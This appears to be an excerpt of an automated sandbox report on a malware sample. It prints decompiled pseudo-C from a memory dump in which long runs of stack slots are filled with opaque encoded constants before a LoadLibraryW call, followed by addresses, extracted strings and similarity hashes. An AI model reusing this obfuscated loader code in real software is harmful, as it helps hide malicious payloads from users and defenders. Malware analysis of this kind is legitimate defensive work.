				 *((intOrPtr*)(_t182 - 0x258)) = 0x73bc18b3;
				 *((intOrPtr*)(_t182 - 0x254)) = 0xfbaf1987;
				 *((intOrPtr*)(_t182 - 0x250)) = 0x213c960f;
				 *((intOrPtr*)(_t182 - 0x24c)) = 0xb9bf1577;
				 *((intOrPtr*)(_t182 - 0x248)) = 0xaab93976;
				 *((intOrPtr*)(_t182 - 0x244)) = 0xee7db1b9;
				 *((intOrPtr*)(_t182 - 0x240)) = 0x1572761c;
				 *((intOrPtr*)(_t182 - 0x23c)) = 0x59cd89c5;
				 *((intOrPtr*)(_t182 - 0x238)) = 0x7ada791b;
				 *((intOrPtr*)(_t182 - 0x234)) = 0x67ea1a56;
				 *((intOrPtr*)(_t182 - 0x230)) = 0xa9d1aaa8;
				 *((intOrPtr*)(_t182 - 0x22c)) = 0x32f177e6;
				 *((intOrPtr*)(_t182 - 0x228)) = 0x9156ed80;
				 *((intOrPtr*)(_t182 - 0x224)) = 0x9d7f5a33;
				 *((intOrPtr*)(_t182 - 0x220)) = 0x63d53a8b;
				 *((intOrPtr*)(_t182 - 0x21c)) = 0xeb2d7b79;
				 *((intOrPtr*)(_t182 - 0x218)) = 0x523c6852;
				 *((intOrPtr*)(_t182 - 0x214)) = 0xbee9a20;
				 *((intOrPtr*)(_t182 - 0x210)) = 0x898c0b5f;
				 *((intOrPtr*)(_t182 - 0x20c)) = 0x133ae6d4;
				 *((intOrPtr*)(_t182 - 0x208)) = 0x30bab8ce;
				 *((intOrPtr*)(_t182 - 0x204)) = 0x9dd4ad8b;
				 *((intOrPtr*)(_t182 - 0x200)) = 0xca86968e;
				 *((intOrPtr*)(_t182 - 0x1fc)) = 0x37c02118;
				 *((intOrPtr*)(_t182 - 0x1f8)) = 0x616c6eae;
				 *((intOrPtr*)(_t182 - 0x1f4)) = 0x1c303d5a;
				 *((intOrPtr*)(_t182 - 0x1f0)) = 0x285a95f;
				 *((intOrPtr*)(_t182 - 0x1ec)) = 0xb13e4962;
				 *((intOrPtr*)(_t182 - 0x1e8)) = 0x7463d38;
				 *((intOrPtr*)(_t182 - 0x1e4)) = 0x65a7c387;
				 *((intOrPtr*)(_t182 - 0x1e0)) = 0x120384ca;
				 *((intOrPtr*)(_t182 - 0x1dc)) = 0x7b578e1a;
				 *((intOrPtr*)(_t182 - 0x1d8)) = 0xa08fbe4e;
				 *((intOrPtr*)(_t182 - 0x1d4)) = 0xf0cba0be;
				 *((intOrPtr*)(_t182 - 0x1d0)) = 0x1dbb148;
				 *((intOrPtr*)(_t182 - 0x1cc)) = 0x89472a31;
				 *((intOrPtr*)(_t182 - 0x1c8)) = 0xd9822949;
				 *((intOrPtr*)(_t182 - 0x1c4)) = 0xe56019;
				 *((intOrPtr*)(_t182 - 0x1c0)) = 0x25c2f49b;
				 *((intOrPtr*)(_t182 - 0x1bc)) = 0x5cd0f997;
				 *((intOrPtr*)(_t182 - 0x1b8)) = 0x78a4ba9e;
				 *((intOrPtr*)(_t182 - 0x1b4)) = 0x1733feff;
				 *((intOrPtr*)(_t182 - 0x1b0)) = 0xf6437fb0;
				 *((intOrPtr*)(_t182 - 0x1ac)) = 0x84dc4db;
				 *((intOrPtr*)(_t182 - 0x1a8)) = 0x50f3c249;
				 *((intOrPtr*)(_t182 - 0x1a4)) = 0x338bbc6b;
				 *((intOrPtr*)(_t182 - 0x1a0)) = 0xfda8c573;
				 *((intOrPtr*)(_t182 - 0x19c)) = 0x68b274ed;
				 *((intOrPtr*)(_t182 - 0x198)) = 0x5e4e4bf4;
				 *((intOrPtr*)(_t182 - 0x194)) = 0x5ade75ee;
				 *((intOrPtr*)(_t182 - 0x190)) = 0xfe16afcb;
				 *((intOrPtr*)(_t182 - 0x18c)) = 0xe99002;
				 *((intOrPtr*)(_t182 - 0x188)) = 0x3b15a4df;
				 *((intOrPtr*)(_t182 - 0x184)) = 0x72b00854;
				 *((intOrPtr*)(_t182 - 0x180)) = 0xe4f63257;
				 *((intOrPtr*)(_t182 - 0x17c)) = 0xd75e1742;
				 *((intOrPtr*)(_t182 - 0x178)) = 0x2d2a2507;
				 *((intOrPtr*)(_t182 - 0x174)) = 0xa3fc5cdd;
				 *((intOrPtr*)(_t182 - 0x170)) = 0xed7ce9c;
				 *((intOrPtr*)(_t182 - 0x16c)) = 0x3a829126;
				 *((intOrPtr*)(_t182 - 0x168)) = 0xc3ceeb83;
				 *((intOrPtr*)(_t182 - 0x164)) = 0x30d64745;
				 *((intOrPtr*)(_t182 - 0x160)) = 0x45186189;
				 *((intOrPtr*)(_t182 - 0x15c)) = 0x21c68a6f;
				 *((intOrPtr*)(_t182 - 0x158)) = 0xea2e0845;
				 *((intOrPtr*)(_t182 - 0x154)) = 0xb18d95b7;
				 *((intOrPtr*)(_t182 - 0x150)) = 0xbf3559c9;
				 *((intOrPtr*)(_t182 - 0x14c)) = 0x1c4d330e;
				 *((intOrPtr*)(_t182 - 0x148)) = 0xd2ed7bdc;
				 *((intOrPtr*)(_t182 - 0x144)) = 0x7a88ba1;
				 *((intOrPtr*)(_t182 - 0x140)) = 0x8e681557;
				 *((intOrPtr*)(_t182 - 0x13c)) = 0x8e21e904;
				 *((intOrPtr*)(_t182 - 0x138)) = 0xadefa415;
				 *((intOrPtr*)(_t182 - 0x134)) = 0xf849fe16;
				 *((intOrPtr*)(_t182 - 0x130)) = 0xaeb06c7f;
				 *((intOrPtr*)(_t182 - 0x12c)) = 0xbce1536a;
				 *((intOrPtr*)(_t182 - 0x128)) = 0x8e426346;
				 *((intOrPtr*)(_t182 - 0x124)) = 0x65d2bcb8;
				 *((intOrPtr*)(_t182 - 0x120)) = 0xff38eb8f;
				 *((intOrPtr*)(_t182 - 0x11c)) = 0xfc2d68ac;
				 *((intOrPtr*)(_t182 - 0x118)) = 0x6df160ad;
				 *((intOrPtr*)(_t182 - 0x114)) = 0xaf6c7fed;
				 *((intOrPtr*)(_t182 - 0x110)) = 0x973dcba0;
				 *((intOrPtr*)(_t182 - 0x10c)) = 0x607f95bf;
				 *((intOrPtr*)(_t182 - 0x108)) = 0xf79ff104;
				 *((intOrPtr*)(_t182 - 0x104)) = 0x5ff1325c;
				 *((intOrPtr*)(_t182 - 0x100)) = 0x92990405;
				 *((intOrPtr*)(_t182 - 0xfc)) = 0xef5a7122;
				 *((intOrPtr*)(_t182 - 0xf8)) = 0xf67f884c;
				 *((intOrPtr*)(_t182 - 0xf4)) = 0x5f05446;
				 *((intOrPtr*)(_t182 - 0xf0)) = 0x4b3d8e6c;
				 *((intOrPtr*)(_t182 - 0xec)) = 0x933f8d6;
				 *((intOrPtr*)(_t182 - 0xe8)) = 0x57c10841;
				 *((intOrPtr*)(_t182 - 0xe4)) = 0xb5a03f8;
				 *((intOrPtr*)(_t182 - 0xe0)) = 0x46fbc152;
				 *((intOrPtr*)(_t182 - 0xdc)) = 0x91e3002b;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t182 - 0xd8)) = 0x3cd185e9;
				 *((intOrPtr*)(_t182 - 0xd4)) = 0x4f6e3982;
				 *((intOrPtr*)(_t182 - 0xd0)) = 0x8007072a;
				 *((intOrPtr*)(_t182 - 0xcc)) = 0xf6ae852f;
				 *((intOrPtr*)(_t182 - 0xc8)) = 0xd9e069d6;
				 *((intOrPtr*)(_t182 - 0xc4)) = 0x50ed7135;
				 *((intOrPtr*)(_t182 - 0xc0)) = 0xf11af6c3;
				 *((intOrPtr*)(_t182 - 0xbc)) = 0xcfaa9a11;
				 *((intOrPtr*)(_t182 - 0xb8)) = 0x3c0388f5;
				 *((intOrPtr*)(_t182 - 0xb4)) = 0x29a2147e;
				 *((intOrPtr*)(_t182 - 0xb0)) = 0xec8c36ec;
				 *((intOrPtr*)(_t182 - 0xac)) = 0xd37f0f51;
				 *((intOrPtr*)(_t182 - 0xa8)) = 0x7102390c;
				 *((intOrPtr*)(_t182 - 0xa4)) = 0xd11229b4;
				 *((intOrPtr*)(_t182 - 0xa0)) = 0xe4a90d0c;
				 *((intOrPtr*)(_t182 - 0x9c)) = 0xa15fc107;
				 *((intOrPtr*)(_t182 - 0x98)) = 0x9477c33;
				 *((intOrPtr*)(_t182 - 0x94)) = 0xeefea971;
				 *((intOrPtr*)(_t182 - 0x90)) = 0x7375348d;
				 *((intOrPtr*)(_t182 - 0x8c)) = 0xb4acef68;
				 *((intOrPtr*)(_t182 - 0x88)) = 0x5d5a45a9;
				 *((intOrPtr*)(_t182 - 0x84)) = 0x5bbc8ce5;
				 *((intOrPtr*)(_t182 - 0x80)) = 0xbe7f5968;
				 *((intOrPtr*)(_t182 - 0x7c)) = 0x4d4ea15e;
				 *((intOrPtr*)(_t182 - 0x78)) = 0x59d61505;
				 *((intOrPtr*)(_t182 - 0x74)) = 0x1beb8dd7;
				 *((intOrPtr*)(_t182 - 0x70)) = 0x4c77ffe8;
				 *((intOrPtr*)(_t182 - 0x6c)) = 0xf4ccfc85;
				 *((intOrPtr*)(_t182 - 0x68)) = 0x9b21eee8;
				 *((intOrPtr*)(_t182 - 0x64)) = 0x2d3e3818;
				 *((intOrPtr*)(_t182 - 0x60)) = 0x4f205279;
				 *((intOrPtr*)(_t182 - 0x5c)) = 0xda6700a;
				 *((intOrPtr*)(_t182 - 0x58)) = 0x423d7a3f;
				 *((intOrPtr*)(_t182 - 0x54)) = 0x5dd72052;
				 *((intOrPtr*)(_t182 - 0x50)) = 0xd0f5a90b;
				 *((intOrPtr*)(_t182 - 0x4c)) = 0x6c91e15b;
				 *((intOrPtr*)(_t182 - 0x48)) = 0x25d278ad;
				 *((intOrPtr*)(_t182 - 0x44)) = 0x110c2516;
				 *((intOrPtr*)(_t182 - 0x40)) = 0xeff902cc;
				 *((intOrPtr*)(_t182 - 0x3c)) = 0xd92713ce;
				 *((intOrPtr*)(_t182 - 0x38)) = 0xa7f4539a;
				 *((intOrPtr*)(_t182 - 0x34)) = 0x63317bfe;
				 *((intOrPtr*)(_t182 - 0x30)) = 0x429993b4;
				 *((intOrPtr*)(_t182 - 0x2c)) = 0xa65b9958;
				 *((intOrPtr*)(_t182 - 0x28)) = 0x291ea408;
				 *((intOrPtr*)(_t182 - 0x24)) = 0x1dafb85;
				 *((intOrPtr*)(_t182 - 0x20)) = 0x41dd936;
				 *((intOrPtr*)(_t182 - 0x1c)) = 0xb1b06b97;
				 *((intOrPtr*)(_t182 - 0x18)) = 0x44e35222;
				 *((intOrPtr*)(_t182 - 0x14)) = 0xe0257b4d;
				 *((intOrPtr*)(_t182 - 0x10)) = 0x99d0ce2a;
				 *((intOrPtr*)(_t182 - 0xc)) = 0xf2eaa2aa;
				 *((intOrPtr*)(_t182 - 8)) = 0x390167fb;
				 *((intOrPtr*)(_t182 - 4)) = 0x6c900bdb;
				_t180 = L041D1D10(0x41e3050, 0x64, __edi, __esi);
				 *0x41e71f4 = LoadLibraryW(_t168);
				L041D1DB0(_t180);
				return E041D1570(_t172,  *0x41e71f4, _t182 - 0x728, _t180, 0x1ca, 0x703a5795, 0x41e6ab0);
			}

0x041dc4a2
0x041dc4a2
0x041dc4ac
0x041dc4b6
0x041dc4c0
0x041dc4ca
0x041dc4d4
0x041dc4de
0x041dc4e8
0x041dc4f2
0x041dc4fc
0x041dc506
0x041dc510
0x041dc51a
0x041dc524
0x041dc52e
0x041dc538
0x041dc542
0x041dc54c
0x041dc556
0x041dc560
0x041dc56a
0x041dc574
0x041dc57e
0x041dc588
0x041dc592
0x041dc59c
0x041dc5a6
0x041dc5b0
0x041dc5ba
0x041dc5c4
0x041dc5ce
0x041dc5d8
0x041dc5e2
0x041dc5ec
0x041dc5f6
0x041dc600
0x041dc60a
0x041dc614
0x041dc61e
0x041dc628
0x041dc632
0x041dc63c
0x041dc646
0x041dc650
0x041dc65a
0x041dc664
0x041dc66e
0x041dc678
0x041dc682
0x041dc68c
0x041dc696
0x041dc6a0
0x041dc6aa
0x041dc6b4
0x041dc6be
0x041dc6c8
0x041dc6d2
0x041dc6dc
0x041dc6e6
0x041dc6f0
0x041dc6fa
0x041dc704
0x041dc70e
0x041dc718
0x041dc722
0x041dc72c
0x041dc736
0x041dc740
0x041dc74a
0x041dc754
0x041dc75e
0x041dc768
0x041dc772
0x041dc77c
0x041dc786
0x041dc790
0x041dc79a
0x041dc7a4
0x041dc7ae
0x041dc7b8
0x041dc7c2
0x041dc7cc
0x041dc7d6
0x041dc7e0
0x041dc7ea
0x041dc7f4
0x041dc7fe
0x041dc808
0x041dc812
0x041dc81c
0x041dc826
0x041dc830
0x041dc83a
0x041dc844
0x041dc84e
0x041dc858
0x041dc862
0x041dc86c
0x041dc876
0x041dc880
0x041dc88a
0x041dc894
0x041dc89e
0x041dc8a8
0x041dc8b2
0x041dc8bc
0x041dc8c6
0x041dc8d0
0x041dc8da
0x041dc8e4
0x041dc8ee
0x041dc8f8
0x041dc902
0x041dc90c
0x041dc91b
0x041dc925
0x041dc92f
0x041dc939
0x041dc943
0x041dc94d
0x041dc957
0x041dc961
0x041dc96b
0x041dc975
0x041dc97f
0x041dc989
0x041dc993
0x041dc99d
0x041dc9a7
0x041dc9b1
0x041dc9bb
0x041dc9c5
0x041dc9cf
0x041dc9d9
0x041dc9e3
0x041dc9ed
0x041dc9f4
0x041dc9fb
0x041dca02
0x041dca09
0x041dca10
0x041dca17
0x041dca1e
0x041dca25
0x041dca2c
0x041dca33
0x041dca3a
0x041dca41
0x041dca48
0x041dca4f
0x041dca56
0x041dca5d
0x041dca64
0x041dca6b
0x041dca72
0x041dca79
0x041dca80
0x041dca87
0x041dca8e
0x041dca95
0x041dca9c
0x041dcaa3
0x041dcaaa
0x041dcab1
0x041dcab8
0x041dcabf
0x041dcac6
0x041dcad5
0x041dcae0
0x041dcae5
0x041dcb11

APIs

LoadLibraryW.KERNEL32(00000000), ref: 041DCAD8

Strings

"qZ, xrefs: 041DC8A8
Rh<R, xrefs: 041DC5E2
yR O, xrefs: 041DCA25
+, xrefs: 041DC8F8
M{%, xrefs: 041DCAAA
y{-, xrefs: 041DC5D8
"RD, xrefs: 041DCAA3
5qP, xrefs: 041DC943
3|G, xrefs: 041DC9B1
?z=B, xrefs: 041DCA33
D 0, xrefs: 041DC524

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: "RD$"qZ$+$3|G$5qP$?z=B$D 0$M{%$Rh<R$yR O$y{-
API String ID: 1029625771-2697299831
Opcode ID: bd3d8893c65479df26b30811262663a77216ab7e02c8576e99bd46490b0ffb1e
Instruction ID: 6f518456af02f4b10ea0972362fbeb4617bbc677433a00c3960b75e6e12dc3c2
Opcode Fuzzy Hash: bd3d8893c65479df26b30811262663a77216ab7e02c8576e99bd46490b0ffb1e
Instruction Fuzzy Hash: 13E188B4846369CBDB60DF829A897CDBA70FB15704F6086C8C19D3B314DB750A86CF85

Uniqueness

Uniqueness Score: -1.00%

Function 041D9C2A, Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 312
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E041D9C2A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t296;
				void* _t306;

				_t296 = __ebx;
				 *((intOrPtr*)(_t306 - 0x488)) = 0x6a4d398f;
				 *((intOrPtr*)(_t306 - 0x484)) = 0x55c9496e;
				 *((intOrPtr*)(_t306 - 0x480)) = 0x85c10421;
				 *((intOrPtr*)(_t306 - 0x47c)) = 0x9320e84e;
				 *((intOrPtr*)(_t306 - 0x478)) = 0x99615d5;
				 *((intOrPtr*)(_t306 - 0x474)) = 0x4eb8d5c7;
				 *((intOrPtr*)(_t306 - 0x470)) = 0x193a4375;
				 *((intOrPtr*)(_t306 - 0x46c)) = 0x6e624913;
				 *((intOrPtr*)(_t306 - 0x468)) = 0x5616a493;
				 *((intOrPtr*)(_t306 - 0x464)) = 0x5f0da257;
				 *((intOrPtr*)(_t306 - 0x460)) = 0x7c43828e;
				 *((intOrPtr*)(_t306 - 0x45c)) = 0x83e69878;
				 *((intOrPtr*)(_t306 - 0x458)) = 0x65452c66;
				 *((intOrPtr*)(_t306 - 0x454)) = 0x40545962;
				 *((intOrPtr*)(_t306 - 0x450)) = 0x501ff0ed;
				 *((intOrPtr*)(_t306 - 0x44c)) = 0xfd17e9c7;
				 *((intOrPtr*)(_t306 - 0x448)) = 0xd89e953b;
				 *((intOrPtr*)(_t306 - 0x444)) = 0x8add80c3;
				 *((intOrPtr*)(_t306 - 0x440)) = 0x70df70f0;
				 *((intOrPtr*)(_t306 - 0x43c)) = 0x9f19943c;
				 *((intOrPtr*)(_t306 - 0x438)) = 0xb8178d91;
				 *((intOrPtr*)(_t306 - 0x434)) = 0x6e3b8fb6;
				 *((intOrPtr*)(_t306 - 0x430)) = 0x3289d0de;
				 *((intOrPtr*)(_t306 - 0x42c)) = 0xb0b8bd2b;
				 *((intOrPtr*)(_t306 - 0x428)) = 0x43fc6a3;
				 *((intOrPtr*)(_t306 - 0x424)) = 0xda4299cc;
				 *((intOrPtr*)(_t306 - 0x420)) = 0x26ab0ef1;
				 *((intOrPtr*)(_t306 - 0x41c)) = 0xf516ec4;
				 *((intOrPtr*)(_t306 - 0x418)) = 0x2b544722;
				 *((intOrPtr*)(_t306 - 0x414)) = 0x123a7ac3;
				 *((intOrPtr*)(_t306 - 0x410)) = 0xa21f517a;
				 *((intOrPtr*)(_t306 - 0x40c)) = 0x44a38e59;
				 *((intOrPtr*)(_t306 - 0x408)) = 0x9e81bf9e;
				 *((intOrPtr*)(_t306 - 0x404)) = 0xb2702bb8;
				 *((intOrPtr*)(_t306 - 0x400)) = 0xa4636a96;
				 *((intOrPtr*)(_t306 - 0x3fc)) = 0x756f16f4;
				 *((intOrPtr*)(_t306 - 0x3f8)) = 0xef965b39;
				 *((intOrPtr*)(_t306 - 0x3f4)) = 0xfa226884;
				 *((intOrPtr*)(_t306 - 0x3f0)) = 0xa40dbf5a;
				 *((intOrPtr*)(_t306 - 0x3ec)) = 0xd46e9a5a;
				 *((intOrPtr*)(_t306 - 0x3e8)) = 0xbf370855;
				 *((intOrPtr*)(_t306 - 0x3e4)) = 0x6344f32c;
				 *((intOrPtr*)(_t306 - 0x3e0)) = 0x3e0d5dd;
				 *((intOrPtr*)(_t306 - 0x3dc)) = 0x1c98b87e;
				 *((intOrPtr*)(_t306 - 0x3d8)) = 0x83a1f915;
				 *((intOrPtr*)(_t306 - 0x3d4)) = 0xb0f90b52;
				 *((intOrPtr*)(_t306 - 0x3d0)) = 0xbc25012d;
				 *((intOrPtr*)(_t306 - 0x3cc)) = 0xdb16c8ea;
				 *((intOrPtr*)(_t306 - 0x3c8)) = 0xbd9c5aa6;
				 *((intOrPtr*)(_t306 - 0x3c4)) = 0x2e88c20;
				 *((intOrPtr*)(_t306 - 0x3c0)) = 0xa3b12f7f;
				 *((intOrPtr*)(_t306 - 0x3bc)) = 0x555b7388;
				 *((intOrPtr*)(_t306 - 0x3b8)) = 0x15e9418a;
				 *((intOrPtr*)(_t306 - 0x3b4)) = 0x8d0a490;
				 *((intOrPtr*)(_t306 - 0x3b0)) = 0xee09c07c;
				 *((intOrPtr*)(_t306 - 0x3ac)) = 0xd2c67d0b;
				 *((intOrPtr*)(_t306 - 0x3a8)) = 0xdded558d;
				 *((intOrPtr*)(_t306 - 0x3a4)) = 0x290b51d2;
				 *((intOrPtr*)(_t306 - 0x3a0)) = 0xb597d190;
				 *((intOrPtr*)(_t306 - 0x39c)) = 0xcc10472e;
				 *((intOrPtr*)(_t306 - 0x398)) = 0x47c66f1;
				 *((intOrPtr*)(_t306 - 0x394)) = 0x6c78c80b;
				 *((intOrPtr*)(_t306 - 0x390)) = 0x524bfa0;
				 *((intOrPtr*)(_t306 - 0x38c)) = 0x9c79039;
				 *((intOrPtr*)(_t306 - 0x388)) = 0x5a990a62;
				 *((intOrPtr*)(_t306 - 0x384)) = 0x57d03df4;
				 *((intOrPtr*)(_t306 - 0x380)) = 0xbe1a0c89;
				 *((intOrPtr*)(_t306 - 0x37c)) = 0x28bdda15;
				 *((intOrPtr*)(_t306 - 0x378)) = 0x56237138;
				 *((intOrPtr*)(_t306 - 0x374)) = 0x5e9d1bcc;
				 *((intOrPtr*)(_t306 - 0x370)) = 0x57a87d95;
				 *((intOrPtr*)(_t306 - 0x36c)) = 0x68caec9f;
				 *((intOrPtr*)(_t306 - 0x368)) = 0x34c45a75;
				 *((intOrPtr*)(_t306 - 0x364)) = 0xd42300d5;
				 *((intOrPtr*)(_t306 - 0x360)) = 0xeb37d20f;
				 *((intOrPtr*)(_t306 - 0x35c)) = 0xfa370ba3;
				 *((intOrPtr*)(_t306 - 0x358)) = 0xe23b3c0e;
				 *((intOrPtr*)(_t306 - 0x354)) = 0x51a38f9a;
				 *((intOrPtr*)(_t306 - 0x350)) = 0x7ff204d7;
				 *((intOrPtr*)(_t306 - 0x34c)) = 0xda447583;
				 *((intOrPtr*)(_t306 - 0x348)) = 0xbefa4e65;
				 *((intOrPtr*)(_t306 - 0x344)) = 0xd1d167a9;
				 *((intOrPtr*)(_t306 - 0x340)) = 0x8834809;
				 *((intOrPtr*)(_t306 - 0x33c)) = 0xde9dcce;
				 *((intOrPtr*)(_t306 - 0x338)) = 0x56147a5;
				 *((intOrPtr*)(_t306 - 0x334)) = 0x99ccd69d;
				 *((intOrPtr*)(_t306 - 0x330)) = 0xe5cb7a11;
				 *((intOrPtr*)(_t306 - 0x32c)) = 0xe90ee76d;
				 *((intOrPtr*)(_t306 - 0x328)) = 0xfc6116e4;
				 *((intOrPtr*)(_t306 - 0x324)) = 0x75d33041;
				 *((intOrPtr*)(_t306 - 0x320)) = 0x717d0669;
				 *((intOrPtr*)(_t306 - 0x31c)) = 0x23a08b51;
				 *((intOrPtr*)(_t306 - 0x318)) = 0xb9008877;
				 *((intOrPtr*)(_t306 - 0x314)) = 0xd099b6a9;
				 *((intOrPtr*)(_t306 - 0x310)) = 0x6cb87068;
				 *((intOrPtr*)(_t306 - 0x30c)) = 0x52dd3a7b;
				 *((intOrPtr*)(_t306 - 0x308)) = 0xb1c4d779;
				 *((intOrPtr*)(_t306 - 0x304)) = 0x24a6249e;
				 *((intOrPtr*)(_t306 - 0x300)) = 0xffac7cfa;
				 *((intOrPtr*)(_t306 - 0x2fc)) = 0xb2778a53;
				 *((intOrPtr*)(_t306 - 0x2f8)) = 0xfc957864;
				 *((intOrPtr*)(_t306 - 0x2f4)) = 0xa41101b8;
				 *((intOrPtr*)(_t306 - 0x2f0)) = 0xe6c581a8;
				 *((intOrPtr*)(_t306 - 0x2ec)) = 0xdecf5441;
				 *((intOrPtr*)(_t306 - 0x2e8)) = 0xb7eb67f3;
				 *((intOrPtr*)(_t306 - 0x2e4)) = 0x733db354;
				 *((intOrPtr*)(_t306 - 0x2e0)) = 0xf233b6ff;
				 *((intOrPtr*)(_t306 - 0x2dc)) = 0x9387f9f9;
				 *((intOrPtr*)(_t306 - 0x2d8)) = 0x39894cb8;
				 *((intOrPtr*)(_t306 - 0x2d4)) = 0xd6bccbbc;
				 *((intOrPtr*)(_t306 - 0x2d0)) = 0xbd383b2c;
				 *((intOrPtr*)(_t306 - 0x2cc)) = 0x3a729915;
				 *((intOrPtr*)(_t306 - 0x2c8)) = 0x217208cd;
				 *((intOrPtr*)(_t306 - 0x2c4)) = 0x96cea10b;
				 *((intOrPtr*)(_t306 - 0x2c0)) = 0x9c9ce9a8;
				 *((intOrPtr*)(_t306 - 0x2bc)) = 0xa07d429a;
				 *((intOrPtr*)(_t306 - 0x2b8)) = 0xa9f4c760;
				 *((intOrPtr*)(_t306 - 0x2b4)) = 0xf2e2eb1a;
				 *((intOrPtr*)(_t306 - 0x2b0)) = 0x1aba5d8c;
				 *((intOrPtr*)(_t306 - 0x2ac)) = 0xd797bbc9;
				 *((intOrPtr*)(_t306 - 0x2a8)) = 0x659adba4;
				 *((intOrPtr*)(_t306 - 0x2a4)) = 0x667d69d0;
				 *((intOrPtr*)(_t306 - 0x2a0)) = 0x7a78e1f2;
				 *((intOrPtr*)(_t306 - 0x29c)) = 0x194c5fef;
				 *((intOrPtr*)(_t306 - 0x298)) = 0x45fea8a3;
				 *((intOrPtr*)(_t306 - 0x294)) = 0xc3c457c3;
				 *((intOrPtr*)(_t306 - 0x290)) = 0x502a9109;
				 *((intOrPtr*)(_t306 - 0x28c)) = 0x698aeccf;
				 *((intOrPtr*)(_t306 - 0x288)) = 0xd1a5ca1a;
				 *((intOrPtr*)(_t306 - 0x284)) = 0xe821d346;
				 *((intOrPtr*)(_t306 - 0x280)) = 0x85a29c71;
				 *((intOrPtr*)(_t306 - 0x27c)) = 0x43b61307;
				 *((intOrPtr*)(_t306 - 0x278)) = 0x863a0e34;
				 *((intOrPtr*)(_t306 - 0x274)) = 0xa45e6864;
				 *((intOrPtr*)(_t306 - 0x270)) = 0xdb94a6c7;
				 *((intOrPtr*)(_t306 - 0x26c)) = 0xbf8b45bc;
				 *((intOrPtr*)(_t306 - 0x268)) = 0xad822626;
				 *((intOrPtr*)(_t306 - 0x264)) = 0x1fd364d;
				 *((intOrPtr*)(_t306 - 0x260)) = 0x916ca2a9;
				 *((intOrPtr*)(_t306 - 0x25c)) = 0x902d8a17;
				 *((intOrPtr*)(_t306 - 0x258)) = 0x6ec4921d;
				 *((intOrPtr*)(_t306 - 0x254)) = 0xacc5fed;
				 *((intOrPtr*)(_t306 - 0x250)) = 0xd3498e8d;
				 *((intOrPtr*)(_t306 - 0x24c)) = 0x2d84d1f5;
				 *((intOrPtr*)(_t306 - 0x248)) = 0x726caabc;
				 *((intOrPtr*)(_t306 - 0x244)) = 0x85273073;
				 *((intOrPtr*)(_t306 - 0x240)) = 0xfcd61666;
				 *((intOrPtr*)(_t306 - 0x23c)) = 0xe9d6a369;
				 *((intOrPtr*)(_t306 - 0x238)) = 0x7734bd66;
				 *((intOrPtr*)(_t306 - 0x234)) = 0xdf2aa64;
				 *((intOrPtr*)(_t306 - 0x230)) = 0x918b975d;
				 *((intOrPtr*)(_t306 - 0x22c)) = 0x75b1a364;
				 *((intOrPtr*)(_t306 - 0x228)) = 0xd7e60e97;
				 *((intOrPtr*)(_t306 - 0x224)) = 0x7d7511fe;
				 *((intOrPtr*)(_t306 - 0x220)) = 0xe389c437;
				 *((intOrPtr*)(_t306 - 0x21c)) = 0x806f1f3c;
				 *((intOrPtr*)(_t306 - 0x218)) = 0xcde22ff4;
				 *((intOrPtr*)(_t306 - 0x214)) = 0x900dcf74;
				 *((intOrPtr*)(_t306 - 0x210)) = 0x56155d78;
				 *((intOrPtr*)(_t306 - 0x20c)) = 0xad62a0c;
				 *((intOrPtr*)(_t306 - 0x208)) = 0xcfa73fb3;
				 *((intOrPtr*)(_t306 - 0x204)) = 0x8dd057fa;
				 *((intOrPtr*)(_t306 - 0x200)) = 0x3d63382a;
				 *((intOrPtr*)(_t306 - 0x1fc)) = 0x791d914b;
				 *((intOrPtr*)(_t306 - 0x1f8)) = 0xceb3dc63;
				 *((intOrPtr*)(_t306 - 0x1f4)) = 0x99c6365d;
				 *((intOrPtr*)(_t306 - 0x1f0)) = 0x6a48090e;
				 *((intOrPtr*)(_t306 - 0x1ec)) = 0xae64116a;
				 *((intOrPtr*)(_t306 - 0x1e8)) = 0xdef0e7bd;
				 *((intOrPtr*)(_t306 - 0x1e4)) = 0x50dbc097;
				 *((intOrPtr*)(_t306 - 0x1e0)) = 0xd297ae40;
				 *((intOrPtr*)(_t306 - 0x1dc)) = 0xea27aecc;
				 *((intOrPtr*)(_t306 - 0x1d8)) = 0x9fe50554;
				 *((intOrPtr*)(_t306 - 0x1d4)) = 0x4f5301c2;
				 *((intOrPtr*)(_t306 - 0x1d0)) = 0xa96243f8;
				 *((intOrPtr*)(_t306 - 0x1cc)) = 0xae755634;
				 *((intOrPtr*)(_t306 - 0x1c8)) = 0x4d6402a3;
				 *((intOrPtr*)(_t306 - 0x1c4)) = 0x125e5bd1;
				 *((intOrPtr*)(_t306 - 0x1c0)) = 0x9bfbe84a;
				 *((intOrPtr*)(_t306 - 0x1bc)) = 0xb370ba49;
				 *((intOrPtr*)(_t306 - 0x1b8)) = 0x1b685335;
				 *((intOrPtr*)(_t306 - 0x1b4)) = 0x3fd5faf4;
				 *((intOrPtr*)(_t306 - 0x1b0)) = 0x9091a891;
				 *((intOrPtr*)(_t306 - 0x1ac)) = 0x1c3f593a;
				 *((intOrPtr*)(_t306 - 0x1a8)) = 0x27dc0042;
				 *((intOrPtr*)(_t306 - 0x1a4)) = 0xf52cf85f;
				 *((intOrPtr*)(_t306 - 0x1a0)) = 0x66c46c7c;
				 *((intOrPtr*)(_t306 - 0x19c)) = 0xe490c533;
				 *((intOrPtr*)(_t306 - 0x198)) = 0x5b91a192;
				 *((intOrPtr*)(_t306 - 0x194)) = 0x7b543b09;
				 *((intOrPtr*)(_t306 - 0x190)) = 0xe274a401;
				 *((intOrPtr*)(_t306 - 0x18c)) = 0xa6f10ee9;
				 *((intOrPtr*)(_t306 - 0x188)) = 0xd17ca9a5;
				 *((intOrPtr*)(_t306 - 0x184)) = 0xfad69f6;
				 *((intOrPtr*)(_t306 - 0x180)) = 0x818fe815;
				 *((intOrPtr*)(_t306 - 0x17c)) = 0x7cccdc08;
				 *((intOrPtr*)(_t306 - 0x178)) = 0x75c53f55;
